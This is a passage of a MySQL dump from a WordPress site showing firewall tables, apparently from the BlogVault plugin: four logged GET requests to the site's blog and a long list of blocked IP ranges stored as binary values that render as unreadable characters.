/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_bv_fw_requests`
--
LOCK TABLES `wp_bv_fw_requests` WRITE;
/*!40000 ALTER TABLE `wp_bv_fw_requests` DISABLE KEYS */;
INSERT INTO `wp_bv_fw_requests` VALUES
(1,'204.48.22.125',1,1692994838,'/blog/','ictbank.ir','GET',200,10,'https://www.google.com/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36','a:0:{}','a:1:{s:6:\"GET[x]\";a:2:{s:4:\"size\";i:14;s:5:\"value\";s:14:\"54257398793704\";}}','a:0:{}','203902531664e90d168fb86','a:0:{}'),
(2,'176.9.154.16',1,1692994839,'/blog/','ictbank.ir','GET',200,10,'','Mozilla/5.0 (Linux; Android 11; moto g power (2022)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36','a:0:{}','a:0:{}','a:0:{}','120490522964e90d17bdf20','a:0:{}'),
(3,'167.235.195.114',1,1692994848,'/blog/','ictbank.ir','GET',200,10,'','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36','a:0:{}','a:0:{}','a:0:{}','24805432364e90d205caf2','a:0:{}'),
(4,'128.14.134.134',1,1692994978,'/blog/','ictbank.ir','GET',200,10,'https://ictbank.ir/blog','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','a:0:{}','a:0:{}','a:0:{}','154359625664e90da2b18fb','a:0:{}');
/*!40000 ALTER TABLE `wp_bv_fw_requests` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_bv_ip_store`
--
DROP TABLE IF EXISTS `wp_bv_ip_store`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bv_ip_store` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`start_ip_range` varbinary(16) NOT NULL,
`end_ip_range` varbinary(16) NOT NULL,
`is_fw` tinyint(1) NOT NULL,
`is_lp` tinyint(1) NOT NULL,
`type` int(1) NOT NULL,
`is_v6` tinyint(1) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
KEY `ip_range` (`start_ip_range`,`end_ip_range`)
) ENGINE=InnoDB AUTO_INCREMENT=1000000 DEFAULT CHARSET=binary;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_bv_ip_store`
--
LOCK TABLES `wp_bv_ip_store` WRITE;
/*!40000 ALTER TABLE `wp_bv_ip_store` DISABLE KEYS */;
INSERT INTO `wp_bv_ip_store` VALUES
(1,'�!�','�!�',1,0,90,0),
(2,'�Z�','�Z�',1,0,90,0),
(3,'�Dly','�Dly',1,0,90,0),
(4,'�Y��','�Y��',1,0,90,0),
(5,'Yɧd','Yɧd',1,0,90,0),
(6,'�[A�','�[A�',1,0,90,0),
(7,' � &\0\0\0\0\0\0\0',' � &\0\0\0\0\0\0\0',1,0,90,1),
(8,'�H�A','�H�A',1,0,90,0),
(9,'D���','D���',1,0,90,0),
(10,'/[�W','/[�W',1,0,90,0),
(11,'�&VW','�&VW',1,0,90,0),
(12,'3D�','3D�',1,0,90,0),
(13,'-�bI','-�bI',1,0,90,0),
(14,'D���','D���',1,0,90,0),
(15,'[�T)','[�T)',1,0,90,0),
(16,'-�b�','-�b�',1,0,90,0),
(17,'��','��',1,0,90,0),
(18,'-���','-���',1,0,90,0),
(19,'�,�@','�,�@',1,0,90,0),
(20,'�>Z','�>Z',1,0,90,0),
(21,'��T','��T',1,0,90,0),
(22,'�K�','�K�',1,0,90,0),
(23,'���','���',1,0,90,0),
(24,'PRM','PRM',1,0,90,0),
(25,'�:�','�:�',1,0,90,0),
(26,'Uw�','Uw�',1,0,90,0),
(27,'C�V','C�V',1,0,90,0),
(28,'M�($','M�($',1,0,90,0),
(29,'/�','/�',1,0,90,0),
(30,'+�8*','+�8*',1,0,90,0),
(31,'\\���','\\���',1,0,90,0),
(32,']k�',']k�',1,0,90,0),
(33,'H��','H��',1,0,90,0),
(34,'2>�(','2>�(',1,0,90,0),
(35,';}f�',';}f�',1,0,90,0),
(36,'X���','X���',1,0,90,0),
(37,'�i�','�i�',1,0,90,0),
(38,'&S\01\0\0\0\0\0\0\0a�','&S\01\0\0\0\0\0\0\0a�',1,0,90,1),
(39,'���;','���;',1,0,90,0),
(40,'#�{D','#�{D',1,0,90,0),
(41,'\"��i','\"��i',1,0,90,0),
(42,'�`5�','�`5�',1,0,90,0),
(43,'���','���',1,0,90,0),
(44,'�_ۗ','�_ۗ',1,0,90,0),
(45,'B�,>','B�,>',1,0,90,0),
(46,'�Z�z','�Z�z',1,0,90,0),
(47,'B�,\'','B�,\'',1,0,90,0),
(48,'�\0��','�\0��',1,0,90,0),
(49,'gc9','gc9',1,0,90,0),
(50,'E���','E���',1,0,90,0),
(51,'X�1�','X�1�',1,0,90,0),
(52,'-(�t','-(�t',1,0,90,0),
(53,'�Z�','�Z�',1,0,90,0),
(54,'£�8','£�8',1,0,90,0),
(55,'�8p�','�8p�',1,0,90,0),
(56,'�i2|','�i2|',1,0,90,0),
(57,'�6�','�6�',1,0,90,0),
(58,'Y�kA','Y�kA',1,0,90,0),
(59,'k��R','k��R',1,0,90,0),
(60,'[','[',1,0,90,0),
(61,':��]',':��]',1,0,90,0),
(62,'@��','@��',1,0,90,0),
(63,'�@��','�@��',1,0,90,0),
(64,'��[','��[',1,0,90,0),
(65,'h��z','h��z',1,0,90,0),
(66,'+�\Zz','+�\Zz',1,0,90,0),
(67,'�4�','�4�',1,0,90,0),
(68,'-���','-���',1,0,90,0),
(69,'���','���',1,0,90,0),
(70,'6ڿg','6ڿg',1,0,90,0),
(71,'QF��','QF��',1,0,90,0),
(72,'-�yY','-�yY',1,0,90,0),
(73,'��� ','��� ',1,0,90,0),
(74,'����','����',1,0,90,0),
(75,'�br\'','�br\'',1,0,90,0),
(76,'� �','� �',1,0,90,0),
(77,'3KM�','3KM�',1,0,90,0),
(78,'��s>','��s>',1,0,90,0),
(79,'£�','£�',1,0,90,0),
(80,'��&','��&',1,0,90,0),
(81,'&�4','&�4',1,0,90,0),
(82,'���m','���m',1,0,90,0),
(83,' A� \0\0\0B�,$',' A� \0\0\0B�,$',1,0,90,1),
(84,' A� \0\0\0B�,',' A� \0\0\0B�,',1,0,90,1),
(85,'��#�','��#�',1,0,90,0),
(86,'H�|�','H�|�',1,0,90,0),
(87,'Q��','Q��',1,0,90,0),
(88,' A� \0\0\0B�,F',' A� \0\0\0B�,F',1,0,90,1),
(89,'��8�','��8�',1,0,90,0),
(90,'�7','�7',1,0,90,0),
(91,'B�,8','B�,8',1,0,90,0),
(92,'B�,5','B�,5',1,0,90,0),
(93,'B�,<','B�,<',1,0,90,0),
(94,'WL','WL',1,0,90,0),
(95,'����','����',1,0,90,0),
(96,'B�,E','B�,E',1,0,90,0),
(97,'B�,F','B�,F',1,0,90,0),
(98,'B�,','B�,',1,0,90,0),
(99,'g��','g��',1,0,90,0),
(100,'[���','[���',1,0,90,0),
(101,'� #','� #',1,0,90,0),
(102,'D���','D���',1,0,90,0),
(103,'� �z','� �z',1,0,90,0),
(104,'ٶ��','ٶ��',1,0,90,0),
(105,'\'j�','\'j�',1,0,90,0),
(106,'�n�s','�n�s',1,0,90,0),
(107,'3���','3���',1,0,90,0),
(108,'/d�','/d�',1,0,90,0),
(109,'��q�','��q�',1,0,90,0),
(110,'��a4','��a4',1,0,90,0),
(111,'3�$','3�$',1,0,90,0),
(112,'^.��','^.��',1,0,90,0),
(113,'[��D','[��D',1,0,90,0),
(114,'AJ�','AJ�',1,0,90,0),
(115,'ν�','ν�',1,0,90,0),
(116,'ν6\Z','ν6\Z',1,0,90,0),
(117,'э1]','э1]',1,0,90,0),
(118,'�$��','�$��',1,0,90,0),
(119,'��t�','��t�',1,0,90,0),
(120,'\"HQ�','\"HQ�',1,0,90,0),
(121,'h�K�','h�K�',1,0,90,0),
(122,'k��','k��',1,0,90,0),
(123,'k��','k��',1,0,90,0),
(124,'B�','B�',1,0,90,0),
(125,'-r�D','-r�D',1,0,90,0),
(126,'&�ɢ','&�ɢ',1,0,90,0),
(127,'f�}','f�}',1,0,90,0),
(128,'��D','��D',1,0,90,0),
(129,'�qG�','�qG�',1,0,90,0),
(130,'6%y�','6%y�',1,0,90,0),
(131,'$\0a�\0\0�\0\0\0\0�0','$\0a�\0\0�\0\0\0\0�0',1,0,90,1),
(132,'13 -','13 -',1,0,90,0),
(133,'�z*�','�z*�',1,0,90,0),
(134,'\"��','\"��',1,0,90,0),
(135,'*��.\0\0\0\0\0\0\0','*��.\0\0\0\0\0\0\0',1,0,90,1),
(136,'Ǽ�3','Ǽ�3',1,0,90,0),
(137,'��','��',1,0,90,0),
(138,'�]\n','�]\n',1,0,90,0),
(139,'1)\"','1)\"',1,0,90,0),
(140,'QGD','QGD',1,0,90,0),
(141,'�Z��','�Z��',1,0,90,0),
(142,'��>','��>',1,0,90,0),
(143,'=','=',1,0,90,0),
(144,'Y��X','Y��X',1,0,90,0),
(145,'�* P','�* P',1,0,90,0),
(146,'��H','��H',1,0,90,0),
(147,'U_�','U_�',1,0,90,0),
(148,'V0\0`','V0\0`',1,0,90,0),
(149,'B*6�','B*6�',1,0,90,0),
(150,'�~�','�~�',1,0,90,0),
(151,'_�)','_�)',1,0,90,0),
(152,'B�/','B�/',1,0,90,0),
(153,'-�\Z','-�\Z',1,0,90,0),
(154,'�L5N','�L5N',1,0,90,0),
(155,' A� \0\0\0B�,',' A� \0\0\0B�,',1,0,90,1),
(156,'h�>�','h�>�',1,0,90,0),
(157,' A� \0\0\0B�,',' A� \0\0\0B�,',1,0,90,1),
(158,'*� 9RT\0\0\0\0\0\0\0','*� 9RT\0\0\0\0\0\0\0',1,0,90,1),
(159,'@[��','@[��',1,0,90,0),
(160,'��D�','��D�',1,0,90,0),
(161,'3Kz�','3Kz�',1,0,90,0),
(162,'#־�','#־�',1,0,90,0),
(163,' A� \0\0\0B�,;',' A� \0\0\0B�,;',1,0,90,1),
(164,'\\̐�','\\̐�',1,0,90,0),
(165,' A� \0\0\0B�,\"',' A� \0\0\0B�,\"',1,0,90,1),
(166,'�*�','�*�',1,0,90,0),
(167,' A� \0\0\0B�,9',' A� \0\0\0B�,9',1,0,90,1),
(168,'���','���',1,0,90,0),
(169,'#���','#���',1,0,90,0),
(170,'gyZ�','gyZ�',1,0,90,0),
(171,'�~�','�~�',1,0,90,0),
(172,'X��','X��',1,0,90,0),
(173,'#��','#��',1,0,90,0),
(174,'�','�',1,0,90,0),
(175,' A� \0\0\0B�,:',' A� \0\0\0B�,:',1,0,90,1),
(176,' A� \0\0\0B�, ',' A� \0\0\0B�, ',1,0,90,1),
(177,' A� \0\0\0B�,\'',' A� \0\0\0B�,\'',1,0,90,1),
(178,' A� \0\0\0B�,8',' A� \0\0\0B�,8',1,0,90,1),
(179,')O�',')O�',1,0,90,0),
(180,'��','��',1,0,90,0),
(181,' A� \0\0\0B�,&',' A� \0\0\0B�,&',1,0,90,1),
(182,' A� \0\0\0B�,%',' A� \0\0\0B�,%',1,0,90,1),
(183,'��#(','��#(',1,0,90,0),
(184,'����','����',1,0,90,0),
(185,'�h,�','�h,�',1,0,90,0),
(186,'�G�I','�G�I',1,0,90,0),
(187,'���\\','���\\',1,0,90,0),
(188,'M�=r','M�=r',1,0,90,0),
(189,'�Dz�','�Dz�',1,0,90,0),
(190,'<+�','<+�',1,0,90,0),
(191,'Q9�','Q9�',1,0,90,0),
(192,'k��','k��',1,0,90,0),
(193,'k�!','k�!',1,0,90,0),
(194,'h�J','h�J',1,0,90,0),
(195,'��bC','��bC',1,0,90,0),
(196,'g���','g���',1,0,90,0),
(197,'ՈD[','ՈD[',1,0,90,0),
(198,'��\r�','��\r�',1,0,90,0),
(199,'J�WB','J�WB',1,0,90,0),
(200,'H�8','H�8',1,0,90,0),
(201,'�]��','�]��',1,0,90,0),
(202,'6���','6���',1,0,90,0),
(203,'*�;C\0\0\0\0\0\0\0','*�;C\0\0\0\0\0\0\0',1,0,90,1),
(204,'#�=�','#�=�',1,0,90,0),
(205,'B�,6','B�,6',1,0,90,0),
(206,'B�,:','B�,:',1,0,90,0),
(207,'6\'�f','6\'�f',1,0,90,0),
(208,'B�,9','B�,9',1,0,90,0),
(209,'��lM','��lM',1,0,90,0),
(210,'���','���',1,0,90,0),
(211,' A� \0\0\0B�,E',' A� \0\0\0B�,E',1,0,90,1),
(212,' A� \0\0\0B�,5',' A� \0\0\0B�,5',1,0,90,1),
(213,' A� \0\0\0B�,<',' A� \0\0\0B�,<',1,0,90,1),
(214,'3�dK','3�dK',1,0,90,0),
(215,'k�B','k�B',1,0,90,0),
(216,'/l�\Z','/l�\Z',1,0,90,0),
(217,'�ւ','�ւ',1,0,90,0),
(218,'��','��',1,0,90,0),
(219,'Վ��','Վ��',1,0,90,0),
(220,'�\"��','�\"��',1,0,90,0),
(221,'��4�','��4�',1,0,90,0),
(222,'�Y;','�Y;',1,0,90,0),
(223,'*@\0\0\0�x��K��','*@\0\0\0�x��K��',1,0,90,1),
(224,'��M','��M',1,0,90,0),
(225,'B�, ','B�, ',1,0,90,0),
(226,'g�\0T','g�\0T',1,0,90,0),
(227,'��>\n','��>\n',1,0,90,0),
(228,'��@-','��@-',1,0,90,0),
(229,'��w�','��w�',1,0,90,0),
(230,'3�hW','3�hW',1,0,90,0),
(231,'>��','>��',1,0,90,0),
(232,'���','���',1,0,90,0),
(233,'P���','P���',1,0,90,0),
(234,'B�,?','B�,?',1,0,90,0),
(235,'$\0�\0\0\0\0�<���`[','$\0�\0\0\0\0�<���`[',1,0,90,1),
(236,'�\0�m','�\0�m',1,0,90,0),
(237,'B�+�','B�+�',1,0,90,0),
(238,' A� \0\0\0B�,',' A� \0\0\0B�,',1,0,90,1),
(239,'���z','���z',1,0,90,0),
(240,' A� \0\0\0B�,=',' A� \0\0\0B�,=',1,0,90,1),
(241,'��','��',1,0,90,0),
(242,'�[ZD','�[ZD',1,0,90,0),
(243,'|z~�','|z~�',1,0,90,0),
(244,'-�\nH','-�\nH',1,0,90,0),
(245,'_o�F','_o�F',1,0,90,0),
(246,'B�,','B�,',1,0,90,0),
(247,'B�,','B�,',1,0,90,0),
(248,'B�,','B�,',1,0,90,0),
(249,'g�>t','g�>t',1,0,90,0),
(250,' A�\0\0\0\0\0\0\0�',' A�\0\0\0\0\0\0\0�',1,0,90,1),
(251,'g9�','g9�',1,0,90,0),
(252,'���','���',1,0,90,0),
(253,'w;`>','w;`>',1,0,90,0),
(254,'^.-','^.-',1,0,90,0),
(255,'&S\0\0\0\0\0\0\0\0!�','&S\0\0\0\0\0\0\0\0!�',1,0,90,1),
(256,'�7L','�7L',1,0,90,0),
(257,'��O','��O',1,0,90,0),
(258,'>�\0�','>�\0�',1,0,90,0),
(259,'3ҷU','3ҷU',1,0,90,0),
(260,'�c�','�c�',1,0,90,0),
(261,'D��','D��',1,0,90,0),
(262,'�lҒ','�lҒ',1,0,90,0),
(263,'����','����',1,0,90,0),
(264,'��H�','��H�',1,0,90,0),
(265,'w�y','w�y',1,0,90,0),
(266,'3OG�','3OG�',1,0,90,0),
(267,'�C\\','�C\\',1,0,90,0),
(268,'\"��q','\"��q',1,0,90,0),
(269,'�V\0','�V\0',1,0,90,0),
(270,'�\\�','�\\�',1,0,90,0),
(271,'�{�\\','�{�\\',1,0,90,0),
(272,'�&�','�&�',1,0,90,0),
(273,'-�\Z','-�\Z',1,0,90,0),
(274,'�\r#�','�\r#�',1,0,90,0),
(275,'���','���',1,0,90,0),
(276,'����','����',1,0,90,0),
(277,'��V4','��V4',1,0,90,0),
(278,'*G�\0\0\0\0\0\0\0�*','*G�\0\0\0\0\0\0\0�*',1,0,90,1),
(279,'k�yG','k�yG',1,0,90,0),
(280,' A� \0\0\0B�,#',' A� \0\0\0B�,#',1,0,90,1),
(281,' A� \0\0\0B�,',' A� \0\0\0B�,',1,0,90,1),
(282,' � ws\0\0\0\0\0\0n~|',' � ws\0\0\0\0\0\0n~|',1,0,90,1),
(283,' A� \0\0\0B�,?',' A� \0\0\0B�,?',1,0,90,1),
(284,'�xA','�xA',1,0,90,0),
(285,'e\0`~','e\0`~',1,0,90,0),
(286,'V0`','V0`',1,0,90,0),
(287,'g��','g��',1,0,90,0),
(288,'��0','��0',1,0,90,0),
(289,'gx��','gx��',1,0,90,0),
(290,'�x�','�x�',1,0,90,0),
(291,'�W��','�W��',1,0,90,0),
(292,'��d�','��d�',1,0,90,0),
(293,'ge�\r','ge�\r',1,0,90,0),
(294,'�A','�A',1,0,90,0),
(295,'\"I��','\"I��',1,0,90,0),
(296,'��I','��I',1,0,90,0),
(297,'��~�','��~�',1,0,90,0),
(298,'q��','q��',1,0,90,0),
(299,'g���','g���',1,0,90,0),
(300,'C�','C�',1,0,90,0),
(301,'�^','�^',1,0,90,0),
(302,'{�l�','{�l�',1,0,90,0),
(303,'�5U�','�5U�',1,0,90,0),
(304,'-��','-��',1,0,90,0),
(305,'�z$�','�z$�',1,0,90,0),
(306,'�k�','�k�',1,0,90,0),
(307,'gf�','gf�',1,0,90,0),
(308,'k�','k�',1,0,90,0),
(309,'&�Lj','&�Lj',1,0,90,0),
(310,'gl��','gl��',1,0,90,0),
(311,'gjt%','gjt%',1,0,90,0),
(312,'ai','ai',1,0,90,0),
(313,'fD8R','fD8R',1,0,90,0),
(314,'4��n','4��n',1,0,90,0),
(315,'�ŝ�','�ŝ�',1,0,90,0),
(316,'Ո]�','Ո]�',1,0,90,0),
(317,'g���','g���',1,0,90,0),
(318,'�\Z','�\Z',1,0,90,0),
(319,'\"�FP','\"�FP',1,0,90,0),
(320,'C�Qk','C�Qk',1,0,90,0),
(321,'Y���','Y���',1,0,90,0),
(322,' �',' �',1,0,90,0),
(323,'�,�:','�,�:',1,0,90,0),
(324,'��','��',1,0,90,0),
(325,'����','����',1,0,90,0),
(326,'Al��','Al��',1,0,90,0),
(327,'���','���',1,0,90,0),
(328,'^��d','^��d',1,0,90,0),
(329,'��J','��J',1,0,90,0),
(330,'XA�','XA�',1,0,90,0),
(331,'� �f','� �f',1,0,90,0),
(332,'�8j�','�8j�',1,0,90,0),
(333,'H�U','H�U',1,0,90,0),
(334,'�w�','�w�',1,0,90,0),
(335,'�~�','�~�',1,0,90,0),
(336,'#���','#���',1,0,90,0),
(337,'��','��',1,0,90,0),
(338,'g���','g���',1,0,90,0),
(339,'g��','g��',1,0,90,0),
(340,'���','���',1,0,90,0),
(341,'g#A�','g#A�',1,0,90,0),
(342,'�^WC','�^WC',1,0,90,0),
(343,'�ѝ','�ѝ',1,0,90,0),
(344,'��W','��W',1,0,90,0),
(345,'��4','��4',1,0,90,0),
(346,'#�j�','#�j�',1,0,90,0),
(347,'_��','_��',1,0,90,0),
(348,'��d�','��d�',1,0,90,0),
(349,'��d�','��d�',1,0,90,0),
(350,'g�','g�',1,0,90,0),
(351,'��T�','��T�',1,0,90,0),
(352,'�Q�~','�Q�~',1,0,90,0),
(353,'u','u',1,0,90,0),
(354,'��(�','��(�',1,0,90,0),
(355,'��','��',1,0,90,0),
(356,'-M��','-M��',1,0,90,0),
(357,'6$�)','6$�)',1,0,90,0),
(358,'��D�','��D�',1,0,90,0),
(359,'vE�F','vE�F',1,0,90,0),
(360,'%�UR','%�UR',1,0,90,0),
(361,'�XLT','�XLT',1,0,90,0),
(362,'46��','46��',1,0,90,0),
(363,'|�','|�',1,0,90,0),
(364,'��','��',1,0,90,0),
(365,'��MP','��MP',1,0,90,0),
(366,'�!|','�!|',1,0,90,0),
(367,'U֦�','U֦�',1,0,90,0),
(368,'��Hz','��Hz',1,0,90,0),
(369,'h��','h��',1,0,90,0),
(370,'3D�Q','3D�Q',1,0,90,0),
(371,'R�c�','R�c�',1,0,90,0),
(372,'��','��',1,0,90,0),
(373,'��','��',1,0,90,0),
(374,'_�BV','_�BV',1,0,90,0),
(375,'�jKG','�jKG',1,0,90,0),
(376,'�;Z','�;Z',1,0,90,0),
(377,'��&N','��&N',1,0,90,0),
(378,'+�h','+�h',1,0,90,0),
(379,'g9�R','g9�R',1,0,90,0),
(380,'���','���',1,0,90,0),
(381,'�_�','�_�',1,0,90,0),
(382,'|�','|�',1,0,90,0),
(383,'g�ڣ','g�ڣ',1,0,90,0),
(384,'�3�','�3�',1,0,90,0),
(385,'3&�D','3&�D',1,0,90,0),
(386,'��L','��L',1,0,90,0),
(387,'�\"�S','�\"�S',1,0,90,0),
(388,'���','���',1,0,90,0),
(389,'+���','+���',1,0,90,0),
(390,'��T�','��T�',1,0,90,0),
(391,'�LJ�','�LJ�',1,0,90,0),
(392,'�;@�','�;@�',1,0,90,0),
(393,'�֬','�֬',1,0,90,0),
(394,'���]','���]',1,0,90,0),
(395,'�(^m','�(^m',1,0,90,0),
(396,'\n�?','\n�?',1,0,90,0),
(397,'MQx�','MQx�',1,0,90,0),
(398,'�G��','�G��',1,0,90,0),
(399,'����','����',1,0,90,0),
(400,'.6��','.6��',1,0,90,0),
(401,'M��','M��',1,0,90,0),
(402,'+��a','+��a',1,0,90,0),
(403,'Ո]�','Ո]�',1,0,90,0),
(404,'�,�)','�,�)',1,0,90,0),
(405,'P���','P���',1,0,90,0),
(406,'��h','��h',1,0,90,0),
(407,'�N�R','�N�R',1,0,90,0),
(408,'��s�','��s�',1,0,90,0),
(409,'3O�','3O�',1,0,90,0),
(410,'D���','D���',1,0,90,0),
(411,'\rK�#','\rK�#',1,0,90,0),
(412,'�cA','�cA',1,0,90,0),
(413,'3SY','3SY',1,0,90,0),
(414,';|��',';|��',1,0,90,0),
(415,'g�T�','g�T�',1,0,90,0),
(416,'�E7o','�E7o',1,0,90,0),
(417,'$\0�\0\0\0\0�<�����','$\0�\0\0\0\0�<�����',1,0,90,1),
(418,'S��g','S��g',1,0,90,0),
(419,'/�)','/�)',1,0,90,0),
(420,'/X�','/X�',1,0,90,0),
(421,'>�UF','>�UF',1,0,90,0),
(422,'.┿','.┿',1,0,90,0),
(423,'H\n2.','H\n2.',1,0,90,0),
(424,'3�Z','3�Z',1,0,90,0),
(425,'3[D�','3[D�',1,0,90,0),
(426,'��n','��n',1,0,90,0),
(427,'��E�','��E�',1,0,90,0),
(428,'3D�F','3D�F',1,0,90,0),
(429,'�Tڈ','�Tڈ',1,0,90,0),
(430,'��','��',1,0,90,0),
(431,'��','��',1,0,90,0),
(432,'��KK','��KK',1,0,90,0),
(433,' D�P!5@IU����',' D�P!5@IU����',1,0,90,1),
(434,' A� \0\0\0B�,>',' A� \0\0\0B�,>',1,0,90,1),
(435,' A� \0\0\0B�,6',' A� \0\0\0B�,6',1,0,90,1),
(436,'�]�','�]�',1,0,90,0),
(437,'h�I�','h�I�',1,0,90,0),
(438,'f���','f���',1,0,90,0),
(439,'�','�',1,0,90,0),
(440,'q�B','q�B',1,0,90,0),
(441,'B�,=','B�,=',1,0,90,0),
(442,'B�,#','B�,#',1,0,90,0),
(443,'3D�','3D�',1,0,90,0),
(444,'B�,(','B�,(',1,0,90,0),
(445,'B�,;','B�,;',1,0,90,0),
(446,'B�,%','B�,%',1,0,90,0),
(447,'���+','���+',1,0,90,0),
(448,'e ��','e ��',1,0,90,0),
(449,'S�}V','S�}V',1,0,90,0),
(450,'gqC ','gqC ',1,0,90,0),
(451,'Rd�1','Rd�1',1,0,90,0),
(452,'����','����',1,0,90,0),
(453,'-�\Z','-�\Z',1,0,90,0),
(454,'?�:�','?�:�',1,0,90,0),
(455,'U�5','U�5',1,0,90,0),
(456,'B�,$','B�,$',1,0,90,0),
(457,'�e`','�e`',1,0,90,0),
(458,'/�1�','/�1�',1,0,90,0),
(459,'6\'�}','6\'�}',1,0,90,0),
(460,'*G�\0=�\0\0\0\0\0\0\0','*G�\0=�\0\0\0\0\0\0\0',1,0,90,1),
(461,'@�l�','@�l�',1,0,90,0),
(462,'Q�m','Q�m',1,0,90,0),
(463,'����','����',1,0,90,0),
(464,'��s','��s',1,0,90,0),
(465,'�Kp3','�Kp3',1,0,90,0),
(466,'��d�','��d�',1,0,90,0),
(467,'�;#�','�;#�',1,0,90,0),
(468,'-�&','-�&',1,0,90,0),
(469,'l��','l��',1,0,90,0),
(470,'��','��',1,0,90,0),
(471,'��','��',1,0,90,0),
(472,'���G','���G',1,0,90,0),
(473,'J�/�','J�/�',1,0,90,0),
(474,'6���','6���',1,0,90,0),
(475,'��g ','��g ',1,0,90,0),
(476,'m{��','m{��',1,0,90,0),
(477,'��d','��d',1,0,90,0),
(478,'e �|','e �|',1,0,90,0),
(479,'�X��','�X��',1,0,90,0),
(480,'�tì','�tì',1,0,90,0),
(481,'�6rM','�6rM',1,0,90,0),
(482,'�\\�','�\\�',1,0,90,0),
(483,'^��P','^��P',1,0,90,0),
(484,'1\0�d','1\0�d',1,0,90,0),
(485,'���','���',1,0,90,0),
(486,'X���','X���',1,0,90,0),
(487,'\"��D','\"��D',1,0,90,0),
(488,'���;','���;',1,0,90,0),
(489,'��','��',1,0,90,0),
(490,' A� \0\0\0B�,',' A� \0\0\0B�,',1,0,90,1),
(491,'k�\rs','k�\rs',1,0,90,0),
(492,'-M(','-M(',1,0,90,0),
(493,')�9',')�9',1,0,90,0),
(494,'�Y�','�Y�',1,0,90,0),
(495,'��W�','��W�',1,0,90,0),
(496,'XyI','XyI',1,0,90,0),
(497,'���:','���:',1,0,90,0),
(498,'rF�s','rF�s',1,0,90,0),
(499,'F\'��','F\'��',1,0,90,0),
(500,'^���','^���',1,0,90,0),
(501,'����','����',1,0,90,0),
(502,'��84','��84',1,0,90,0),
(503,'#��@','#��@',1,0,90,0),
(504,'\r@��','\r@��',1,0,90,0),
(505,'[y�W','[y�W',1,0,90,0),
(506,'@%=B','@%=B',1,0,90,0),
(507,'B�,','B�,',1,0,90,0),
(508,'B�,&','B�,&',1,0,90,0),
(509,'Xw�Y','Xw�Y',1,0,90,0),
(510,'B�,','B�,',1,0,90,0),
(511,'�kZ�','�kZ�',1,0,90,0),
(512,'ÿ ','ÿ ',1,0,90,0),
(513,'�b�','�b�',1,0,90,0),
(514,'��d�','��d�',1,0,90,0),
(515,'�D/6','�D/6',1,0,90,0),
(516,'��e�','��e�',1,0,90,0),
(517,'£(�','£(�',1,0,90,0),
(518,'ё?�','ё?�',1,0,90,0),
(519,'N�W','N�W',1,0,90,0),
(520,'�W�','�W�',1,0,90,0),
(521,'��|','��|',1,0,90,0),
(522,'C�=L','C�=L',1,0,90,0),
(523,'<3Ҝ','<3Ҝ',1,0,90,0),
(524,'��Q�','��Q�',1,0,90,0),
(525,'b�l�','b�l�',1,0,90,0),
(526,'<+�\\','<+�\\',1,0,90,0),
(527,'��d','��d',1,0,90,0),
(528,'��4','��4',1,0,90,0),
(529,'�c�','�c�',1,0,90,0),
(530,'�Z��','�Z��',1,0,90,0),
(531,'\"��H','\"��H',1,0,90,0),
(532,'*���s\0\0\0\0\0\0\0','*���s\0\0\0\0\0\0\0',1,0,90,1),
(533,'}���','}���',1,0,90,0),
(534,'�a�','�a�',1,0,90,0),
(535,'�Jy','�Jy',1,0,90,0),
(536,'B�,\"','B�,\"',1,0,90,0),
(537,'���%','���%',1,0,90,0),
(538,'��G�','��G�',1,0,90,0),
(539,'���v','���v',1,0,90,0),
(540,'��Z�','��Z�',1,0,90,0),
(541,'\\5`','\\5`',1,0,90,0),
(542,'Al��','Al��',1,0,90,0),
(543,'�HӦ','�HӦ',1,0,90,0),
(544,'{:��','{:��',1,0,90,0),
(545,'Q��','Q��',1,0,90,0),
(546,'����','����',1,0,90,0),
(547,'\\5`�','\\5`�',1,0,90,0),
(548,'(Q�','(Q�',1,0,90,0),
(549,'g��<','g��<',1,0,90,0),
(550,'D��P','D��P',1,0,90,0),
(551,'\"P�@','\"P�@',1,0,90,0),
(552,'�;�','�;�',1,0,90,0),
(553,'�\Z��','�\Z��',1,0,90,0),
(554,'�g�','�g�',1,0,90,0),
(555,'��́','��́',1,0,90,0),
(556,'�;\n�','�;\n�',1,0,90,0),
(557,'�;N','�;N',1,0,90,0),
(558,'��r�','��r�',1,0,90,0),
(559,'O�;','O�;',1,0,90,0),
(560,'э$v','э$v',1,0,90,0),
(561,'D��','D��',1,0,90,0),
(562,'�N�3','�N�3',1,0,90,0),
(563,'��(�','��(�',1,0,90,0),
(564,'�a��','�a��',1,0,90,0),
(565,'���O','���O',1,0,90,0),
(566,'$_e','$_e',1,0,90,0),
(567,'��PS','��PS',1,0,90,0),
(568,'�1 :','�1 :',1,0,90,0),
(569,'�W�\r','�W�\r',1,0,90,0),
(570,'����','����',1,0,90,0),
(571,'[�T','[�T',1,0,90,0),
(572,'�6�@','�6�@',1,0,90,0),
(573,'/�.','/�.',1,0,90,0),
(574,'D���','D���',1,0,90,0),
(575,'�c��','�c��',1,0,90,0),
(576,'��\09','��\09',1,0,90,0),
(577,'.�y','.�y',1,0,90,0),
(578,'�b��','�b��',1,0,90,0),
(579,' A�\0!�\0\0\0\0\0\0\0\0',' A�\0!�\0\0\0\0\0\0\0\0',1,0,90,1),
(580,'�ة','�ة',1,0,90,0),
(581,'gI��','gI��',1,0,90,0),
(582,'�$��','�$��',1,0,90,0),
(583,'�S�','�S�',1,0,90,0),
(584,'px�','px�',1,0,90,0),
(585,'$��','$��',1,0,90,0),
(586,'��5�','��5�',1,0,90,0),
(587,'��,','��,',1,0,90,0),
(588,'Z���','Z���',1,0,90,0),
(589,'\'i�F','\'i�F',1,0,90,0),
